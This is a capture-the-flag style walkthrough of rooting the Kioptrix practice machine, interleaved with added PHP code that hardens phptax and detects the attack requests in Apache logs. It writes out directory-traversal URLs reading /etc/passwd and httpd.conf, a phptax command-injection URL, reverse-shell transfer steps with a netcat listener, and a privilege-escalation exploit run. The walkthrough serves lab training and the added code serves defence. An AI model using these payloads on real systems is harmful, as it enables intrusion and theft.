Kioptrix Report:
  1. First of all we would like to find the system in the LAN.
    (nmap/arp/wireshark) = 172.16.0.23
  2. Try to find vulnerabilities:
  • Nikto scanning: nikto -h 172.16.0.23
    Server: Apache 2.2.21 (FreeBSD). Nikto also reports other features: PHP version, OpenSSL version, allowed HTTP methods, port 80, etc.

* Look for developer mistakes in the header tags (View Source).
  • In this case the developer didn't delete the META tag, which points to:
    pChart2.1.3/index.php
    To check this path, paste it in the URL after the IP.
  • Surprise! We have access to the web application :)

We would like to check the site and look for new vulnerabilities with Tamper Data / Burp Suite.

With Tamper Data we can see information about the session, copy the files, and check our permissions and injection points.

In our example the injection point is after the = sign, in place of the file name.

Now we have a kind of half shell; try to navigate to the /etc/passwd file and read the user information.

As we saw at the beginning, the operating system is FreeBSD and the server is Apache 2.2.
Try to find the Apache configuration file:
http://172.16.0.23/pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf

I also found a file, /etc/rc.conf, which gave me information about the services:
there I found which ones are enabled, and the firewall rules.

Open the httpd.conf.
The server is listening on ports 80 and 8080.

Scrolling down you can find information about a browser-compatibility check and a path with root permissions.
Try to open the page on port 8080 with a User-Agent of Mozilla 4.0.

Open the file and look for a new injection point.

Open Tamper Data and find where the files will be saved to:
http://172.16.0.23:8080/phptax/drawimage.php?pfilez=1040d1-pg1.tob

The injection point is after the .tob: the executed command takes the files and converts them to PDF.
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
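The fragment above shows why a single ";" in pfilez is enough: str_replace() only touches the ".tob" substring, and everything else in the parameter is pasted straight into the exec() string. The following is an added example, not code from the writeup or from phptax itself, that puts the quoted pattern next to a hardened rewrite of the same logic. The data directory, the convert binary, the placeholder $image resource and the allowlist pattern for form names are assumptions made for illustration.

```php
<?php
// Added example: the drawimage.php pattern quoted on the page, beside a
// hardened version. Not part of phptax or of the original writeup.

// Vulnerable pattern (as quoted from phptax on the page):
//   $pfilef = str_replace(".tob", ".png", $_GET[pfilez]);
//   $pfilep = str_replace(".tob", ".pdf", $_GET[pfilez]);
//   if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
// Anything after ".tob" survives str_replace() untouched and lands inside the
// exec() string, so a ";" in pfilez ends the convert command and starts another.

/**
 * Return the bare form name (e.g. "1040d1-pg1") when $pfilez is a well-formed
 * ".tob" name, or null otherwise. The allowlist is the real defence: no
 * separators, slashes, extra dots or whitespace can get past it.
 * (Assumed naming rule; adjust the pattern to the application's real form names.)
 */
function safe_form_basename(string $pfilez): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,40}\.tob$/', $pfilez)) {
        return null;
    }
    return substr($pfilez, 0, -4); // strip ".tob"
}

/**
 * Build the convert command with every argument shell-quoted. escapeshellarg()
 * is defence in depth behind the allowlist, not a substitute for it.
 */
function build_convert_command(string $base, string $dataDir): string
{
    $png = $dataDir . '/' . $base . '.png';
    $pdf = $dataDir . '/' . $base . '.pdf';
    return 'convert ' . escapeshellarg($png) . ' ' . escapeshellarg($pdf);
}

$pfilez = (string) ($_GET['pfilez'] ?? '');
$action = (string) ($_GET['pdf'] ?? '');

$base = safe_form_basename($pfilez);
if ($base === null) {
    http_response_code(400);
    exit('invalid form name');
}

// Assumed layout: the PDF directory sits next to this script.
$dataDir = __DIR__ . '/data/pdf';

// Placeholder image; in phptax the form image is drawn earlier in the script.
$image = imagecreatetruecolor(200, 100);

header('Content-type: image/png');
if ($action === '') {
    imagepng($image);
} elseif ($action === 'make') {
    imagepng($image, $dataDir . '/' . $base . '.png');
    // Collect the exit status so a failed conversion is logged, not silent.
    exec(build_convert_command($base, $dataDir), $output, $status);
    if ($status !== 0) {
        error_log("convert failed for $base with status $status");
    }
}
```

With the allowlist in place a value such as "1040ab-pg1.tob;whoami>test.txt" is rejected with a 400 before any shell is involved; escapeshellarg() only matters if the allowlist is ever loosened.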

Try to write any command in the URL and redirect its output to a file:
http://172.16.0.23:8080/phptax/index.php?pfilez=1040ab-pg1.tob;whoami%3Etest.txt&pdf=make

Visit the file:
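Both of the requests used so far (the absolute path in pChart's Script parameter and the ";" appended to phptax's pfilez parameter) leave a clear trace in the Apache access log. The following is an added example, not from the writeup, of a small detector run over constructed combined-format log lines; the log lines, the timestamps and the naming rule for .tob files are constructed for the example.

```php
<?php
// Added example: flag the two request shapes from the writeup in Apache
// access logs. Not part of the original report; log lines are constructed.

const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [12/Mar/2014:10:01:02 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=Example01.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2014:10:02:17 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf HTTP/1.1" 200 19420 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2014:10:05:44 +0000] "GET /phptax/drawimage.php?pfilez=1040d1-pg1.tob&pdf=make HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
10.0.0.5 - - [12/Mar/2014:10:06:01 +0000] "GET /phptax/index.php?pfilez=1040ab-pg1.tob;whoami%3Etest.txt&pdf=make HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
LOG;

/** Return ['ip', 'method', 'target'] for one combined-format line, or null. */
function parse_access_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"/', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'method' => $m[2], 'target' => $m[3]];
}

/** Return the reasons a request target looks like an attack; empty if none. */
function classify_request(string $target): array
{
    $reasons = [];
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query)) {
        return $reasons;
    }
    parse_str($query, $params); // parse_str also percent-decodes (%3E -> >)

    if (isset($params['Script']) && is_string($params['Script'])) {
        $s = $params['Script'];
        // pChart's viewer is meant to show files in its own examples directory.
        if ($s !== '' && ($s[0] === '/' || strpos($s, '..') !== false)) {
            $reasons[] = 'pChart Script parameter points outside the examples directory';
        }
    }
    if (isset($params['pfilez']) && is_string($params['pfilez'])) {
        // Same assumed naming rule as the hardened drawimage.php: plain name + .tob
        if (!preg_match('/^[A-Za-z0-9_-]{1,40}\.tob$/', $params['pfilez'])) {
            $reasons[] = 'phptax pfilez parameter is not a plain .tob name';
        }
    }
    return $reasons;
}

/** Scan a whole log and return one entry per suspicious request. */
function scan_log(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = parse_access_line($line);
        if ($req === null) {
            continue;
        }
        $reasons = classify_request($req['target']);
        if ($reasons !== []) {
            $hits[] = ['ip' => $req['ip'], 'target' => $req['target'], 'reasons' => $reasons];
        }
    }
    return $hits;
}

foreach (scan_log(SAMPLE_LOG) as $hit) {
    printf("%s %s\n   %s\n", $hit['ip'], $hit['target'], implode('; ', $hit['reasons']));
}
```

Run against the sample, the benign Example01.php view and the plain 1040d1-pg1.tob request pass, and the two requests from the writeup are reported with their reason. The percent-decoding step matters: matching on the raw URL would miss an encoded ";" (%3B) that parse_str turns back into the separator the shell sees.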

Now that we can write to files, I would like to fetch and transfer the reverse shell file to Kioptrix:
  1. Open rs.php and update the IP, port & shell
  2. Host: python -m SimpleHTTPServer 8000
  3. Run the file! (From the URL)
  4. Host: sudo nc -l 8000 -v

  5. I would like to escalate the situation, and I find a FreeBSD privilege escalation script on Google. Save the script as esc.c
  6. Host: python -m SimpleHTTPServer 8000

  1. gcc esc.c -o xfile
  2. file xfile
  3. Run the file: ./xfile
  4. We have root permission!! :)



Fabio Lior Rahamim